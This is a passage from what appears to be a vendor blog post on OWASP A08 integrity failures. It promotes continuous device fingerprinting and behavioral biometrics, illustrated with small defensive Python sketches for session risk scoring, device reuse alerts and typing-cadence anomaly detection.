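# Hypothetical signal weights; a real system would learn or tune these.
WEIGHTS = {
    "new_device": 30,
    "device_seen_on_many_accounts": 35,
    "behavior_mismatch": 40,
    "script_integrity_alert": 50,
    "sensitive_action": 15,
}
STEP_UP_AT, BLOCK_AT = 40, 80  # hypothetical decision thresholds


@dataclass
class SessionEvent:
    action: str
    signals: set[str]


def decide(event: SessionEvent) -> tuple[int, str]:
    """Score one in-session event and choose a response."""
    score = sum(WEIGHTS.get(signal, 0) for signal in event.signals)
    if score >= BLOCK_AT:
        return score, "block"
    if score >= STEP_UP_AT:
        return score, "step_up"
    return score, "allow"


session = [
    SessionEvent("login", set()),
    SessionEvent("view_orders", set()),
    SessionEvent("change_payout_account", {"sensitive_action", "behavior_mismatch"}),
    SessionEvent("withdraw_funds", {"sensitive_action", "behavior_mismatch", "script_integrity_alert"}),
]
for event in session:
    print(event.action, *decide(event))
# login 0 allow
# view_orders 0 allow
# change_payout_account 55 step_up
# withdraw_funds 105 block
```

The session passed its login check cleanly. It is the later, re-evaluated events that trigger step-up and then blocking, which is the behavior CARTA adds on top of a one-time gate.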

Continuous Monitoring of Device and Behavioral Biometrics

Device fingerprinting is especially relevant to A08 because compromised packages, tampered browser scripts, replayed sessions, and malicious automation frequently preserve the appearance of a valid user journey while changing the device or execution context underneath. CrossClassify's device fingerprinting solution describes continuous device monitoring and a broad device recognition approach designed to detect threats at the product level. In practical terms, that helps identify reused devices, suspicious virtualized environments, abrupt device binding changes, or repeated cross account use that would not be explained by normal customer behavior.

A concrete reference is CrossClassify Device Fingerprinting, where device identity is positioned as an ongoing trust signal rather than a one time attribute lookup. That is useful after A08 style failures because a malicious update or injected script may still create behavior that clusters around abnormal device continuity, emulator use, repeated high risk hardware profiles, or impossible reuse patterns across accounts and workflows.
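Two of the patterns mentioned here can be sketched with simple bookkeeping over (account, device) observations. One is a single device appearing across many accounts. The other is an account abruptly switching to an unfamiliar device. The fingerprint strings, the `DeviceMonitor` class, and the threshold of three accounts per device are hypothetical. Production device fingerprinting relies on far richer signals and must also handle legitimately shared devices.

```python
from collections import defaultdict

MAX_ACCOUNTS_PER_DEVICE = 3  # hypothetical threshold


class DeviceMonitor:
    """Tracks which devices each account uses and which accounts each device touches."""

    def __init__(self) -> None:
        self.accounts_by_device: dict[str, set[str]] = defaultdict(set)
        self.devices_by_account: dict[str, set[str]] = defaultdict(set)

    def observe(self, account: str, device: str) -> list[str]:
        alerts = []
        known = self.devices_by_account[account]
        if known and device not in known:
            alerts.append(f"{account}: new device {device} (known: {len(known)})")
        known.add(device)
        self.accounts_by_device[device].add(account)
        count = len(self.accounts_by_device[device])
        if count > MAX_ACCOUNTS_PER_DEVICE:
            alerts.append(f"{device}: used by {count} accounts")
        return alerts


monitor = DeviceMonitor()
monitor.observe("alice", "fp-laptop-1")
print(monitor.observe("alice", "fp-emulator-9"))
# ['alice: new device fp-emulator-9 (known: 1)']
print([monitor.observe(acct, "fp-emulator-9") for acct in ("bot-1", "bot-2", "bot-3")])
# [[], [], ['fp-emulator-9: used by 4 accounts']]
```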

Behavioral biometrics adds the missing human layer. CrossClassify's behavioral page explains continuous monitoring across typing cadence, pointer trajectory, touch pressure, scroll rhythm, field timing, navigation rhythm, geo context, and link analysis, all combined with device fingerprinting and real time risk scoring. This matters because many integrity failures eventually manifest as someone doing something they should not be doing, even when the technical entry point was a tampered artifact rather than a stolen password.

A practical reference appears in CrossClassify Behavioral Biometrics, where the platform is described as fusing device fingerprinting and behavioral patterns across web and mobile. That is directly relevant to A08 because a malicious package, session hijack, support widget compromise, or injected payment page script can all end up driving behavior that departs from the legitimate user's normal cadence, navigation, or transaction rhythm.

The combined effect is stronger than either signal on its own. Device fingerprinting helps preserve continuity of technical identity, while behavioral biometrics helps preserve continuity of human identity. When A08 controls fail upstream, that combination becomes a high value detection layer for account takeover, fake account creation, automated abuse, and risky post-login actions that static WAF, MFA, or checksum-based controls may not catch in time.
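Behavioral biometrics systems model many signals jointly, but the core idea of comparing live behavior with a personal baseline can be shown with a single feature. The sketch below compares the mean inter-key interval of a new typing sample with a user's historical per-session means, using a z-score. The millisecond values and the threshold of 3 standard deviations are hypothetical. A single feature like this would be far too noisy to act on alone.

```python
import statistics


def cadence_z_score(baseline_means_ms: list[float], sample_intervals_ms: list[float]) -> float:
    """How many standard deviations a new sample's mean interval sits from the baseline."""
    mu = statistics.mean(baseline_means_ms)
    sigma = statistics.stdev(baseline_means_ms)  # needs at least two baseline sessions
    return (statistics.mean(sample_intervals_ms) - mu) / sigma


# Hypothetical per-session mean inter-key intervals for one user (milliseconds).
baseline = [182.0, 175.0, 190.0, 178.0, 185.0]

human_like = [170.0, 195.0, 181.0, 188.0]
scripted = [12.0, 11.0, 12.0, 13.0]  # uniform, machine-speed input

for label, sample in (("returning user", human_like), ("automation", scripted)):
    z = cadence_z_score(baseline, sample)
    print(label, round(z, 1), "anomalous" if abs(z) > 3 else "consistent")
# returning user 0.3 consistent
# automation -28.9 anomalous
```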

Necessity of Continuous Monitoring of Device Fingerprinting and Behavioral Biometrics in Line with A08 Concerns

The necessity comes from a basic truth: software integrity controls validate origin, but business protection requires validating live trust. A signed package can still have been built in a compromised environment, a legitimate session can still be hijacked after a third party script leak, and a correct login can still become fraudulent behavior minutes later.

That is why continuous monitoring is not an optional add on for modern applications. Device fingerprinting helps answer whether the same technical actor is still present, and behavioral biometrics helps answer whether the same human actor is still present. Together, they create a practical trust continuity layer that is highly aligned with OWASP A08's concern about treating the untrusted as trusted.

For application owners, this makes the digital world safer in a very practical way. It reduces the chance that an integrity breach becomes silent fraud, shortens detection time when trusted channels start behaving abnormally, and gives risk teams a way to intervene before compromised code or tampered data turns into customer harm, compliance exposure, or systemic abuse. That is the strongest reason to combine preventive integrity controls with CrossClassify style continuous monitoring.

Conclusion

Software or Data Integrity Failures deserve more attention than they often receive because they sit at the exact point where organizations mistake familiarity for trust. OWASP's 2025 framing makes clear that the category is about much more than dependency hygiene: it is about verifying the authenticity of software, updates, scripts, artifacts, and serialized data before and during use.

The defensive lesson is therefore layered. You need trusted repositories, digital signatures, change review, CI and CD segregation, and integrity protection for client influenced state. But you also need a runtime trust layer, because real incidents like SolarWinds, Kaseya, Ticketmaster, and NotPetya show that attackers often exploit the same mechanisms organizations rely on for convenience and scale.

For that reason, the strongest implementation path is to combine preventive controls with Zero Trust, CARTA, device fingerprinting, and behavioral biometrics. A useful starting point is Zero Trust Architecture and Modern AI Cybersecurity, which explains why no actor or channel should be trusted by default, and it becomes more powerful when paired with Continuous Adaptive Risk and Trust Assessment, where trust is evaluated continuously during the session.

That strategy becomes operational when identity continuity is monitored through CrossClassify Device Fingerprinting and CrossClassify Behavioral Biometrics. Used together, these layers help application owners spot the moment a trusted path stops behaving like a trusted path, which is ultimately the core business challenge hidden inside OWASP A08.
